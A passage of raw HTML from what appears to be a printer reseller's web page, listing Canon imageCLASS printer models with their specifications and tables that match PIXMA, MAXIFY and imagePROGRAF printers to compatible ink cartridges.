src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		    <table width=\"378\" border=\"1\">\n      <tbody>\n      <tr>\n        <td width=\"170\"><strong>Model</strong></td>\n        <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n      </tr>\n      <tr>\n        <td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td>\n        <td>Maintenance Cartridge MC-20</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Blue)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Chroma Optimizer)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Gray)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Matte Black)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Photo Black)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Photo Cyan)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Photo Gray)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Photo Magenta)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Red)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Yellow)</td>\n      </tr>\n      <tr>\n        <td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td>\n        <td>PGI-2700 (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Yellow)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Yellow)</td>\n      </tr>\n        <tr>\n        <td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td>\n        <td>PGI-2700 (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Yellow)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Yellow)</td>\n      </tr>\n      <tr>\n        <td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td>\n        <td>PGI-2700 (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Yellow)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Yellow)</td>\n      </tr>\n      <tr>\n        <td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td>\n        <td>PGI-2700 (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Yellow)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Yellow)</td>\n      </tr>\n      <tr>\n        <td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td>\n        <td>PGI-2700 (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Yellow)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Magenta)</td>\n        </tr>\n      <tr>\n        <td>PGI-2700XL (Yellow)</td>\n      </tr>\n      <tr>\n        <td rowspan=\"3\" align=\"center\">PIXMA E3170</td>\n        <td>CL-57 (Colour)</td>\n      </tr>\n      <tr>\n        <td>CL-57S (Colour)</td>\n      </tr>\n      <tr>\n        <td>PG-47 (Pigment Black)</td>\n      </tr>\n      <tr>\n        <td rowspan=\"3\" align=\"center\">PIXMA E410</td>\n        <td>CL-57 (Colour)</td>\n      </tr>\n      <tr>\n        <td>CL-57S (Colour)</td>\n      </tr>\n      <tr>\n        <td>PG-47 (Pigment Black)</td>\n      </tr>\n      </tbody>\n    </table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td 